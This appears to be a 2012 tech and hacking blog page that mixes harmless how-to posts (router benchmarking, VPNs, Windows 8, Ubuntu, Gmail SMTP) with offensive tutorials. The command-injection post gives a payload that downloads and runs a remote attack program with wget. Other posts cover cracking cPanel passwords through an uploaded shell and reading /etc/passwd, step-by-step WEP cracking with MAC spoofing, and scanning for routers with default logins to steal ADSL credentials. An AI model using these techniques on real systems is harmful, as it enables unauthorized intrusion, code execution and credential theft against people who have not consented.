Friday, 31 August 2012

Thermal Cameras Allows Anyone to Steal ATM Pin Numbers


Thermal Cameras Allows Anyone to Steal ATM Pin Numbers

ATM-Numbers.jpg
Summary Scientists are warning thieves could use thermal imaging cameras to capture a person's credit card pin number or door entry code.

Security researchers have found that thermal cameras can be combined with computer algorithms to automate the process of stealing payment card data processed by automatic teller machines.

At the Usenix Security Symposium in San Francisco, the researchers said the technique has advantages over more common ATM skimming methods that use traditional cameras to capture the PINs people enter during transactions. That's because customers often obscure a camera's view with their bodies, either inadvertently or on purpose. What's more, it can take a considerable amount of time for crooks to view the captured footage and log the code entered during each session.

Thermal imaging can vastly improve the process by recovering the code for some time after each PIN is entered. Their output can also be processed by an algorithm that automates the process of translating it into the secret code.

atm-pin-theft

The findings expand on 2005 research from Michal Zalewski, who is now a member of Google's security team. The Usenix presenters tested the technique laid out by Zalewski on 21 subjects who used 27 randomly selected PINs and found the rate of success varied depending on variables including the types of keypads and the subjects' body temperature.

How to measure wireless router performance

Are you getting all that you can from your wireless router? How do you know? If you're not getting the same range or throughput as you used to, something may be awry. Here's how to measure your wireless router's performance to make sure that it's running at its best:

Signal strength
To measure signal strength and to identify the active wireless channels around you, we recommend using a program called inSSIDer.

When you launch inSSIDer, you'll notice a list of wireless networks around you, including your own. Each network's signal strength is displayed in the RSSI column. The signal strength is updated in near real-time, so you can actually move around with your laptop to observe fluctuations in signal strength.


wireless-router

Throughput

To measure throughput, download and install a program called QCheck, by Ixia. It's a free download, but you'll have to register to get the download link e-mailed to you.

Install QCheck on two computers--one that's plugged into your router via Ethernet and one on a wireless computer. Each computer with QCheck installed is considered an endpoint. Alternatively, you can install QCheck on just the computer you'll be running the QCheck console on, then install Ixia's Performance Endpoint software on the partner computer.

After starting QCheck, enter the IP address of Endpoint1 (the PC running the QCheck console) and Endpoint2 (the partner PC). Select "Throughput" in the Options section and click the Run button to get your throughput results.

wireless-router

That's it. Your wireless router's signal strength and network throughput measurements will help you confirm whether or not your wireless network is performing as expected. If not, these tools should also help you narrow down the cause.

How to use VPN to defeat Deep Packet Inspection

How to use VPN to defeat Deep Packet Inspection

Imagine a technology that can stop spam and malware, identify and block illegal downloads, and allow ISPs to prioritize the data they transmit by content as well as by type. Sounds pretty good.

Now imagine a technology that gives network managers and governments the ability to monitor everything you do on the Internet, including reading and recording your e-mail and other digital communications, and tracking your every move on the Web.

Of course, it's the same technology--deep packet inspection (DPI) by name. That's how governments around the world are able to spy on their citizens' online activities and control their access to the Internet.

ISPs have long been able to record every site you visit and track what you do on those sites. They can and do block access to specific sites.

But only recently has it become practical from a bandwidth and resource perspective for network providers to read all the data in the packets sent from and delivered to their customers' computers without slowing their networks to a crawl.

North Korea, China, Iran, and other countries routinely use deep packet inspection to block Internet content and keep tabs on their citizens.

The easiest way to cover your Web tracks is to encrypt your data and network connection. The most popular encryption services use a virtual private network(VPN).

Free VPN services come with a price
The free HTTPS Everywhere Firefox add-on from the Electronic Frontier Foundation automatically encrypts connections on sites that support the technology. Unfortunately, not all sites support HTTPS, among other limitations.

A more thorough technique for preventing your Web activities from being recorded is to establish a VPN connection. The Tech Support Alert site rates several free VPN services in its guide to anonymous-surfing products.

Topping the list are CyberGhost VPN, ProXPN, and SecurityKiss.

I tried the free versions of ProXPN and OpenVPN's Private Tunnel, but the first is too slow (and annoying), and the second gives you only 100MB of data transfers. The paid versions of both products remove these limitations, as you might have guessed.

Quick and simple setup, but painful performance in the free version

It took only a few minutes to install ProXPN and sign up for a free account. Click the red lock icon that appears in the Windows notification area or Mac menu bar to establish an encrypted connection.

Once your VPN connection is established, hover over the green lock icon to view the IP address and other information about the VPN server you're linking through.

The free version's slow 100Kbps maximum transfer speed harkens back to the pre-broadband days of dial-up modems. Also, when you open your browser you have to click through an annoying ProXPN "upgrade now" screen to get to your designated home page.

According to the company's site, the ProXPN Premium service has "no bandwidth restrictions, all available ports are open, PPTP VPN enabled (in addition to our standard OpenVPN), full access to all proXPN servers world-wide, and port selection." The premium version costs $10 a month or $50 for six months; the company offers a 7-day free trial.

Not much encryption offered by the free version of OpenVPN's Private Tunnel
Apart from the 100MB data limit, the open-source Private Tunnel service is a breeze to sign up for and use. But most Internet users will burn through the free version's data-transfer allotment in a couple of days. As with ProXPN, Private Tunnel places an icon on the desktop that you click to establish an encrypted connection.


The service offers 50GB of protected data transfers for $12 a year, 100GB for $20 per year, and 500GB for $50 per year; the company estimates that most people transfer between 50GB and 100GB of data per year.

By comparison, the free version of the OpenVPN-based SecurityKiss service provides up to 300MB of encrypted data transmissions per month for free. An account allowing up to 20GB per month costs $3.97 for one month or $31.71 for one year; while the service's unlimited plan costs $13.25 for one month or $119.26 for one year. (Three-month and six-month plans with various data limits are also available.)

Many people will respond to the privacy threat posed by deep packet inspection with a big yawn. After all, if you don't want to be tracked, don't use the Internet. But privacy advocates such as the Electronic Privacy Information Center and the Electronic Frontier Foundation are unanimous in their opposition to indiscriminate online eavesdropping, whether it's done by public or private entities. For the time being, it remains possible to keep the trackers at bay. Use it or lose it.

How to Download and Install the Microsoft Windows 8 Release Preview

How to Download and Install the Microsoft Windows 8 Release Preview

Get ready, beta testers. Microsoft debuted Windows 8 Release Preview, which is one of the last steps before a final release of Windows 8 this fall. Versions of the operating system are available for both 32-bit and 64-bit systems.

Here's what Microsoft says is new or enhanced over previous beta releases:
  • New Bing-powered apps, including ones for travel, news, and sports
  • Improvements to Mail, Photos, and People apps
  • Increased Start personalization
  • Better multiple-monitor support
  • Better Windows Store navigation
  • New family safety and security functionality
  • Enhanced touch support for Internet Explorer 10
Warning

As with past betas of Windows 8, Microsoft advises users to not install the operating system on a computer used for day-to-day work. There's also no going back without wiping your hard drive.

download windows 8

You can't downgrade from Windows 8 since it cannot access the recovery partition of your hard drive. If you need to downgrade, ensure you have recovery disks readily available.

f you are already running Windows 8 Consumer Preview or Developer Preview, Microsoft says you can upgrade to Release Preview. There's a downside to upgrading, though: you cannot keep any of your files.

To run Windows 8 Release Preview, your test computer will need a processor with a clock speed of 1GHz or greater, 1GB (32-bit version), or 2GB (64-bit version) of RAM, at least 16GB (32-bit) or 20GB (64-bit) of available hard drive space, and a graphics card that supports DirectX 9 with a WDDM driver.

For select features, you will also need multitouch support, Internet access, and a screen resolution of at least 1024 pixels by 768 pixels.

Where to Download Windows 8 Release Preview

If you meet these requirements, head over to the download page on Microsoft's site and enter your email and country. Since the free Release Preview is available in 14 languages, chances are you'll find a version of the software available for your region.

Clicking 'Download' will start the download of the "Windows 8 Release Preview Setup." Running this application automates most of the set-up process, and selects the appropriate version of the preview for your machine. If you're a bit more daring and technologically savvy, Microsoft has provided direct links to ISO files.

These must be turned into installation media that are burned to a DVD drive or copied to a USB flash drive in order to complete the install. That's the installation process in a nutshell, but again--be wary. This is preview software, so keep mission critical work off your test PC.

Have you installed Windows 8 Release Preview? Did you previously install the Consumer Preview? Let us know your thoughts on this latest release and anything you notice that needs a little work.

Dual Booting Ubuntu on Your Windows 7 Ultrabook

Dual Booting Ubuntu on Your Windows 7 Ultrabook


Ubuntu is one of the best choices for a worry-free operating system. It is open source, and there are literally applications for everything you could ever want to do. Think of it like an iPhone without the need to pay for things. Also, there are no viruses to worry about. This is the number one reason to use Ubuntu over the standard Win7 interface. If you are thinking of purchasing a Windows 7 Ultrabook with a Newegg coupon or from your local Best Buy store, Ubuntu should be your very next move.

Once you have loaded your Ultrabook and connected to the Internet, you're ready to go. Follow these steps to break free from Win 7.

1. Log into Ubuntu website at http://www.ubuntu.com/

This is the only place to go to get the Ubuntu download. Ubuntu is completely free. If you have come across Ubuntu on a Warez or file sharing site that wants you to purchase access, don't do it. Get the safe Ubuntu download directly from the source.

2. Once you've made it to the Ubuntu site, click on the "Downloads" tag in the navigation bar at the top of the screen.


3. The next screen will give you the option to choose a server, desktop or cloud version. Choose the "Desktop Version" tab; it is the compatible version for Ultrabooks.

4. At the top of the page, you can choose either the 32-bit or 64-bit version. For the Ultrabook, choose the 64-bit version, then click the "Download Windows Installer."

5. Save the wubi.exe file directly to your desktop. It will come from the ubuntu.virginmedia.com site. If this isn't the path that comes up, abort the connection because you have been redirected to an unauthorized site.

6. Once the download has completed, click on the Ubuntu icon on the desktop and choose run.

7. The interface will open and allow you to choose the size of memory for your dual-boot -- you can max this out at 30 GB.

8. Also, choose a user name and password and then click install. Depending on the size of your memory allocation and the speed of your processor, this could take several minutes.

9. When the set-up wizard finishes reboot your Windows 7 Ultrabook.

10. The Ubuntu splash screen will load after the reboot. This is normal as it is finishing the installation. This is the only time the splash screen will come up after a reboot.

11. Each time you restart or reboot the computer you will have the choice to load the computer in Windows 7 or Ubuntu.

That's it, you're done. You now have one of the most cost effective, worry-free operating systems on the planet in one of the sleekest, lightest portable computing systems you can buy. It also isn't bogged down with trail ware or unnecessary background programs so it will load up fast. You'll never have to worry about viruses or your system not being compatible with existing hardware. The global team of experts, who build and maintain Ubuntu, update and test the system daily.

Hack websites using Command Injection

Hack websites using Command Injection

What is Command Injection?
Command injection is an attack method in which we alters the dynamically generated content on a Web page by entering shell commands into an input mechanism, such as a form field that lacks effective validation constraints. We can exploit that vulnerability to gain unauthorized access to data or network resources. When users visit an affected Web page, their browsers interpret the code, which may cause malicious commands to execute in the users' computers and across their networks. The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable website. In situation like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it as any authorized system user. However, commands are executed with the same privileges and environment as the application has. Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers etc.).

hack websites using command injection
Command Injection Tutorial for Hackers
This can happen in any programming language but its very common in PERL, PHP and shell based CGI. It is less common in Java, Python and C++ ..:P i haven't tried it yet there :D tried once or twice but not able to do so, that why uncommon..:P.

Lets understand things using examples
Consider the below PHP code:
<?PHP
$email_subject ="Welcome to HackingLoops";

if  ( isset ($_GET {'email'} ) ) {
system( "mail " + $_GET {'email'}) + "-s ' " + $email_subject +
" ' < /tmp/email_body", $return_val);
}
?>
The above code is an example where user sends his or her email address in the email parameter, and that user input is directly placed in the system command. Ahh... loophole...
Now similar to SQL injection or XPath injection, our goal is to inject the shell command into the email parameter but make sure code before and after the email parameter remain syntactically correct otherwise the injection will not execute.
Consider the system( ) call as small jigsaw puzzle game where we arrange different puzzle part to make a single image. All the parts except one part are on its place, now we have to find the middle part to finish the puzzle.. :D simple task in game but little tricky in command injection. So our objective is something shown below:
mail  [missing puzzle part]  -s  'Welcome to HackingLoops'  </tmp/email_body
Note: For the missing puzzle part, we need to ensure that the mail command runs properly and exits properly basically i want to focus on syntax, it should be syntactically correct.
For example mail  --help will runs and exits properly. Now we can add other additional shell commands by separating the commands by a semi colon (;).
We can also comment the missing puzzle part using the shell commenting symbol (#) in front. So we can manipulate the missing puzzle part as below:
--help; wget http://somehackersite.com/attack_program;  ./attack_program #
Now the adding our missing puzzle part to our original existing shell command, the below shell command is created:
mail --help; wget http://somehackersite.com/attack_program; ./attack_program # s 'Welcome to HackingLoops' < /tmp/email_body
This resulting command is equivalent to below command:
mail --help; wget http://somehackersite.com/attack_program; ./attack_program
Now what the above command will do..:P You all guys are just reading things like novice hackers.. Any Guess...:P ok..let me explain..
The above shell command will runs the mail --help and then downloads the attack program from somehackersite.com  and executes it on victim, allowing the hacker to perform the arbitrary commands on the vulnerable website. In most cases provide the complete access to the root directory..:P Now do whatever you want to do..
That's all my friends. I hope that you all have enjoyed the tutorial, if you have any doubts or queries ask me in form of comments.
Copy Cats its last warning from HackingLoops, stop copying our articles, if you copy articles always mention the source. Otherwise get ready for DMCA penalty and negative rating on Google.

How To Crack Cpanel Passwords


Ok now lets talk about something different today.. many hackers just deface index pages for fame, many wants to get the hold on the server... some are genious and some are script kiddies... what if you got access to the server with limited permissions... and you have targeted a website on that server... what would you do at that time...!

And the real game STARTS NOW... we will learn how to crack a Cpanel password for all the websites that are hosted on that server or the particular one with the help of this method "Cpanel Cracking/Hacking!"...!!

First of all...we need a cpanel cracking shell on that server to crack the passwords of the websites that are hosted on that server!!

Step 1

First we have to upload cp.php cpanel cracking shell on that server to start our journey...!!

Step 2

Second thing we need, is the mother of this method!! Yes...we need Usernames of the websites and a Extremely capable password dictionary to crack!!

Now lets start...

Grab all the usernames of websites hosted on the website with the help these commands

1- "ls /var/mail"
2- "/etc/passwd"



Now you will see all the usersnames of the websites and the password list you have provided! Just press the "Go" button and just wait and watch your success!


If you have supplied strong enough password list then you will the a good response from the server ;) like this "Cracking success with username "ABC" with password "XYZ"




else it will show you negative response like this "Please put some good passwords to crack username "ABC" :( "

Inshort... the success of cracking usernames is directly proportional to the password dictionary provided  ;)

Free GPRS Settings for All Mobile Operators (India)

Free GPRS Settings for All Mobile Operators (India)


Free GPRS Settings for All Mobile Operators

Airtel Live

Profile Neme: Live
Homepage: http://live.airtelworld.com
Username: blank
Password: blank
APN: airtelfun.com
Proxy and Server Adress or IP: 100.1.200.99
Port: 8080
Data bearer - GPRS or Packet Data.
Authentication: normal

Airtel GPRS or Mobile Office

Profile Neme: mo
Homepage: http://google.com
Username: blank
Password: blank
APN: airtelgprs.com
Proxy and Server Adress or IP: 202.56.231.117
Port: 8080
Data bearer - GPRS or Packet Data.
Authentication: normal

IDEA

Profile Neme:Idea
Homepage: http://wap.ideafresh.com
Username: blank
Password: blank
APN: imis
Proxy and Server Adress or IP: 10.4.42.45
Port: 8080
Data bearer - GPRS or Packet Data.
Authentication: normal

Smart SMARTWAP:

* Account name : SMARTWAP
* Access point name: SMARTWAP
* Home page: http://wap.rworld.co.in/gsm/index.wml
* Wapgateway proxy IP address: 97.253.29.199
* Port: 8080

Smart SMATRNET:

* Account name: SMARTNET
* Access point name: SMARTNET
* Home page: http://www.google.co.in
* Wapgateway proxy IP address: 97.253.29.199
* Port: 8080

Smart MMS:

* Account name: RTLMMS
* Access point name:MMS
* Homepage: http://10.114.0.5/mms/
* Wapgateway IP: 10.114.0.13
* Port: 9401

Vodafone live Settings:

Account Name - Vodafone Live
User Name - leave Blank
Password - leave Blank
Proxy - Enabled/yes
Access Point Name - portalnmms
Proxy - Enabled/yes.
Proxy and Server address - 010.010.001.100
Proxy and Server Port - 9401 or 8080
Homepage - http://live.vodafone.in
Authentication Type - Normal

BSNL gprs Settings:

Account Name - bsnlwap
Username - leave blank
Password - leave blank
Proxy - Enabled/yes
Homepage - http://wap.cellone.in
Proxy and Server address - 010.132.194.196
Proxy and Server Port - 8080
Acces Point Name - wapnorth.cellone.in
Data bearer - GPRS/ Packetdata
Authentication Type - Normal

BSNL NEW GPRS/EDGE/3G SETTING

Send an SMS
ACT 3G TO 53733
[TOLL FREE]
BSNL LIVE APN = bsnllive
IP = 10.220.67.131
PORT = 8080
HOMEPAGE = http://bsnllive.in
BSNL MMS APN = bsnlmms
IP = 10.210.10.11
PORT = 8080
HOMEPAGE = http://bsnlmmsc.in

BSNL NET
APN = bsnlnet
IP = NONE
PORT = NONE
HOMEPAGE = http://www.google.co.in

Need Aircel GPRS/Internet free Setting for Chinese Mobile:

Using Internet through Mobile:(Pocket Internet)

* Account name: Aircel Online
* Home page: http://myaircel.com
* Access point name: aircelwap
* Wapgateway IP: 172.17.83.69
* Port: 8080
*Username - leave blank
*Password - leave blank

Using Internet through Computer:

* Account name: Aircel Online
* Home page: http://www.google.com
* Access point name: aircelweb
* Wapgateway IP: leave blank
* Port: leave blank
*Username - leave blank
*Password - leave blank

[Note: Use Data cable to connect to PC using your Mobile PC Suit. Lots of handset is now not supporting internet using blue tooth..].

Spice

* Account name: Spice wap
* Home page: http://wap.spicetele.com
*Dial up number: 6830
* Wapgateway IP: 10.200.200.3
* Port: 8080
* Carrier type: Data GSM
*Username - +91 followed by users no.
*Password - spice

BPL

Account Name - BPL WAP
Username - leave blank
Password - leave blank
Proxy - Enabled/yes
Homepage - http://wap.mizone.bplmobile.com
Proxy and Server address - 10.0.0.10
Proxy and Server Port - 8080
Acces Point Name - mizone
Data bearer - GPRS/ Packetdata
Authentication Type - Normal

Tata Docomo

Account Name - Tata Docomo Divein
Username - leave blank
Password - leave blank
Proxy - Enabled/yes
Homepage - http://divein.tatadocomo.com
Proxy and Server address - 010.124.094.007
Proxy and Server Port - 8080
Acces Point Name - TATA.DOCOMO.DIVE.IN
Data bearer - GPRS/ Packetdata
Authentication Type - Normal
Virgin Mobile GPRS/EDGE/3G Setting
Customer Care No. 121
Balance check: *111#
1.Virgin Internet
(For any mobile chinese,micromax,fly,olive,Karbon,airfone,intex..)
Profile name- vinternet
Homepage- http://www.google.co.in
APN- vinternet.in
IP- 000.000.000.000
Port- 0
Authentification type:Normal
Bearer:GPRS(if required)
2.Virgin Internet
(For Samsung,Nokia New phones.)
Profile name- vinternet
Homepage- http://www.google.co.in
APN- vinternet.in
IP:(blank)
Port:(blank)
Authentification type:Normal
Bearer:GPRS(if required)
Uninor GPRS/EDGE/3G Setting
*For Getting Uninor WAP,Uninor GPRS,Uninor MMS setting Simple send sms
ALL to 58355

1.Uninor GPRS Settings
(For any mobile chinese,micromax,fly,olive,Karbon,airfone,intex..)
Profile name: uninor
Homepage: www.google.com
Enable Proxy
Ip address: 10.58.10.58
Port: 8080
APN: uninor
Bearer: GPRS(if required)
2.Uninor GPRS Settings
(For Samsung,Nokia New phones.)
Profile name: uninor
home page:www.uninor.in
proxy address:(blank)
proxy port:(blank)
data account:packet data
apn:uninor
authentification type:Normal
Bearer:GPRS(if required)

Free GPRS Settings for All Mobile Operators
.............................................................................

Download WiFi Slax Wireless Hacking Live-CD v3.1 + Plugins Updated

Download WiFi Slax Wireless Hacking Live-CD v3.1 + Plugins Updated



WiFi Slax Wireless Hacking Live-CD v3.1 + Plugins Updated

WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products. WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver. Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long. A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of strong encryption while a 128 bit key has 104. The IV is placed in encrypted frames header, and is transmitted in plain text.

Traditionally, cracking WEP keys has been a slow and boring process. An attacker would have to capture hundreds of thousands or millions of packets? a process that could take hours or even days, depending on the volume of traffic passing over the wireless network. After enough packets were captured, a WEP cracking program such as Aircrack would be used to find the WEP key.

Basic Directions:

1)Boot from cd
2)Get the wep key
3)Write it down
4)Reboot into windows
5)Connect using wep key.

........................................................................................................................................................................

Beginners Guide To Hacking Wireless Networks

Beginners Guide To Hacking Wireless Networks



Hacking WEP wifi passwords
Basic Entry into a WEP Encrypted Network

This Tutorial explains EVERYTHING in detail So, it is quite long. Enjoy.

1. Getting the right tools
This Tutorial is in Bt3 But Download The Latest Release Bt4.

Download Backtrack 4. It can be found here:

http://www.backtrack-linux.org/downloads/

 I downloaded the Dvd iso and burned it to a Dvd. Insert your BT4 Dvd/usb drive and reboot your computer into BT4. I always load into the 3rd boot option from the boot menu. (VESA/KDE) You only have a few seconds before it auto-boots into the 1st option so be ready. The 1st option boots too slowly or not at all so always boot from the 2nd or 3rd. Experiment to see what works best for you.

2. Preparing the slave network for attack

Once in BT4, click the tiny black box in the lower left corner to load up a "Konsole" window. Now we must prep your wireless card.
Type:

airmon-ng

You will see the name of your wireless card. (mine is named "ath0") From here on out, replace "ath0" with the name of your card.
Now type:

airmon-ng stop ath0

then type:

ifconfig wifi0 down

then:

macchanger --mac 00:11:22:33:44:55 wifi0

then:

airmon-ng start wifi0

What these steps did was to spoof (fake) your mac address so that JUST IN CASE your computeris discovered by someone as you are breaking in, they will not see your REAL mac address. Moving on...
Now it's time to discover some networks to break into.

Type:

airodump-ng ath0

Now you will see a list of wireless networks start to populate. Some will have a better signal than others and it is a good idea to pick one that has a decent signal otherwise it will take forever to crack or you may not be able to crack it at all.
Once you see the network that you want to crack, do this:

hold down ctrl and type c

This will stop airodump from populating networks and will freeze the screen so that you can see the info that you need.

**Now from here on out, when I tell you to type a command, you need to replace whatever is in parenthesis with what I tell you to from your screen. For example: if i say to type:
-c (channel)
then dont actually type in
-c (channel)
Instead, replace that with whatever the channel number is...so, for example you would type:
-c 6
Can't be much clearer than that...lets continue...

Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on...you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.

[Image: airodump.jpg]

Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this --> 05:gk:30:fo:s9:2n
The Channel number will be under a heading that says "CH".
Now, in the same Konsole window, type:

airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0

the FILE NAME can be whatever you want. This is simply the place that airodump is going to store the packets of info that you receive to later crack. You don't even put in an extension...just pick a random word that you will remember. I usually make mine "wepkey" because I can always remember it.

**Side Note: if you crack more than one network in the same session, you must have different file names for each one or it won't work. I usually just name them wepkey1, wepkey2, etc.

Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector" but in noob terms all this means is "packets of info that contain clues to the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password.

Now you are thinking, "I'm screwed because my IV's are going up really slowly." Well, don't worry, now we are going to trick the router into giving us HUNDREDS of IV's per second.

3. Actually cracking the WEP password

Now leave this Konsole window up and running and open up a 2nd Konsole window. In this one type:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

http://i574.photobucket.com/albums/ss184...eplay1.jpg

This will send some commands to the router that basically cause it to associate with your computer even though you are not officially connected with the password. If this command is successful, you should see about 4 lines of text print out with the last one saying something similar to "Association Successful :-)" If this happens, then good! You are almost there. Now type:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

http://i574.photobucket.com/albums/ss184...eplay2.jpg

This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean...just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds...sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password.

Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password. Type:

aircrack-ng -b (bssid) (filename)-01.cap

Remember the filename you made up earlier? Mine was "wepkey". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap
Once you have done this you will see aircrack fire up and begin to crack the password. typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000." DON'T DO ANYTHING! It will stay running...it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it finally gets it.

http://i574.photobucket.com/albums/ss184...crack1.jpg

If you do everything correctly up to this point, before too long you will have the password! now if the password looks goofy, dont worry, it will still work. some passwords are saved in ASCII format, in which case, aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.

Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as:
se:cr:et
This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FKW9427VF" then it would still display as:
0F:KW:94:27:VF
Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!

It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.

I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network. :-)

I will gladly answer any legitimate questions anyone has to the best of my ability.
HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY ANSWERED. No one wants to hold your hand through this...read the tut and go experiment until you get it right.

There are rare occasions where someone will use WEP encryption with SKA as well. (Shared Key Authentication) If this is the case, additional steps are needed to associate with the router and therefore, the steps I lined out here will not work. I've only seen this once or twice, though, so you probably won't run into it. If I get motivated, I may throw up a tut on how to crack this in the future.
Hacking WEP wifi passwords
By Uday

Hacking Routers - FREE ADSL

Hacking Routers - FREE ADSL


Hacking ADSL Routers for free accounts


Most of the people never change their default passwords no matter what it is, they don't change them because they think that they are safe. In this tutorial I'll show you one of the ways how to use this mistake and get free ADSL/Wireless (If wireless router is used) accounts and enjoy in unlimited downloads.

First we will download the necessary tools:

1.) XPass
2.) Angry IP Scanner v3.0.4 Beta
3.) If you don't have Java installed, download and install it here: JAVA

You will also need to have version 8 OR older of Internet Explorer.


Ok so let's start with getting the job done:

1.) Go to WhatIsMyIp
and check your IP address, let's say that your current (ADSL providers usually give you dynamic IP's) IP is 67.140.112.83, you will change the last two groups of numbers.

2.) Open Angry IP scanner it will look like this:

[Image: pic1hr.png]


Now where it says IP range in the first input field we'll enter our IP address 67.140.112.83 (but we'll change the last two-or three digits, in this case there are two to zero) so it will be like this: 67.140.112.0

And in the second input field we will enter the IP with changed last two groups of numbers so it actually has something to scan, we'll change it to:

67.140.150.254

And before we click scan we need to set some options so it only shows us alive hosts:

Click Tools and then click preferences:

[Image: pic2q.png]

Then under the under the ports tab under Port Selection type 80 'cos we will be interested in hosts with port 80 opened:

[Image: pic3hi.png]

And on the display tab choose "Hosts with open ports only":

[Image: pic4e.png]

Then click OK to save the preferences and click start:

[Image: pic5f.png]

After few seconds or minutes you should see your first IP addresses:

[Image: pic6c.png]

Now just select one of the IP addresses and open it with INTERNET EXPLORER!!!

It will ask you for a login credentials:

[Image: pic7kh.png]

Now here comes the mistake people often make, default username and password, in this case it was admin:admin but you can look for default router passwords and usernames, so when I logged in it looked like this:

[Image: pic8.png]

Now for most of the routers (atleast the ones I had exp. with) you can find username in plain text and password covered with *'s when setting up a new connection, so just look for something that says connection wizard or connection setup, and follow the steps till you find the username and password as mentioned.

So why did we use Internet Explorer for this??

Because XPass works only with IE, we couldn't figure the pass out if we used Firefox or Chrome or Opera.

And now when we have the page where username and pass. are just open XPass click on the X sign and drag it over the *'s and you will have this:

[Image: pic9v.png]

And password in this case is: 854179


Continue doing this with different IP's that Angry IP Scanner detects till you have enough accounts to fulfill your download needs.

Hope you liked the tutorial.


Dont forget to comment :))

[Video Tut] WEP Cracking



Presents WEP [Wireless Cracking] Video Tutorial In High Quality Full Detailed [Noob Friendly]
By Mr.Mind fReak


Download:


How to use Gmail as your SMTP server

How to use Gmail as your SMTP server


One of the little-known freebies Gmail offers is a portable SMTP server to send mail from any network for any email address.
Travellers who use their ISP's SMTP server to send mail with their email program (like Thunderbird or Outlook Express) can find themselves in a bind if they're on another network away from home, like at a coffee shop, airport or visiting relatives. But if you've got a free Gmail account (get one here) you can use Google's SMTP server to send mail through Thunderbird 
from you@example.com
 Update: Google rewrites the from address to your Gmail address.. Here's how to set it up:
  1. In your email client software, under Outgoing mail, set the SMTP server to smtp.gmail.com.
  2. Set the your username is yourgooglemailname@gmail.com and make sure "Use username and password" is checked.
  3. Also check off "TLS" under "Use secure connection."
And voila! You can send mail for any email address from any network (that lets you connect to an outside SMTP server) using your Gmail account - be sure to enter your Gmail password when prompted.
Check out Gmail's help section on POP access for Gmail for specific instructions for setting this up with your email program. If you only want to use the SMTP server, skip the POP bits and only set up SMTP to work with your existing email account.
Update : I was remiss not to point out that Gmail will set the from address for messages sent through smtp.google.com to yourgoogleemailname@gmail.com when using this method. Profuse apologies.
Share

WebBackdoors , Attack, Evasion and Detection

WebBackdoors , Attack, Evasion and Detection


This paper provides insight on common web back doors and how simple manipulations could make them undetectable by AV and other security suits. Paper explains few techniques that could be used to render undetectable and unnoticed backdoor inside web applications. This paper is mainly an update for an old paper of ours Effectiveness of Antivirus in Detecting Web Application Backdoors, which mainly questioned the effectiveness of AV with respect to web shells and analysis of a couple of web shells. Current paper takes this topic further and explains a couple of methodologies that could be used to make stealth application layer backdoors using web scripting languages .This paper explains various Web Backdoor attacks and evasion techniques that could be used to stay undetected.

Download PDF  

A Code Execution Vulnerability in Google App Engine SDK for Python

A Code Execution Vulnerability in Google App Engine SDK for Python

Google App Engine is a great technology allowing web developers to develop their own web applications,test them in their internal framework, and deploy them to Google’s appspot.com domain.The Google App Engine framework allows developers to write their web site logic in Python, and offers several frameworks specially created for this. In addition, Google App Engine provides an SDK Console via web that acts as an administration console for the newly written application.This advisory lists 4 different vulnerabilities, one in admin console and three others in the Google python API, which allow a remote attacker to gain full code execution on the developer’s machine. These severe issues have been communicated to Google, and a fix was released last month on Sep 12, 2012 (in version 1.5.4).

Download PDF

Official GNOME Shell Extensions

Official GNOME Shell Extensions

Official GNOME Shell Extensions Available In The WebUpd8 GNOME 3 PPA For Ubuntu 11.10

The latest official GNOME Shell Extensions (version 3.2.0) are now available in the WebUpd8 GNOME 3 PPA for Ubuntu 11.10 Oneiric Ocelot. This PPA is an attempt to have all the stable GNOME 3.2 packages that aren't available in the official Ubuntu 11.10 repositories in a single place. Please note that I did not package this. I'm only uploading these packages to a single PPA.

GNOME Shell Extensions is an official GNOME package that provides additional functionality for GNOME Shell, like a classic menu, restore the power-off entry in the user menu, the user theme extension which allows you to easily switch between GNOME Shell themes and more.
 
 

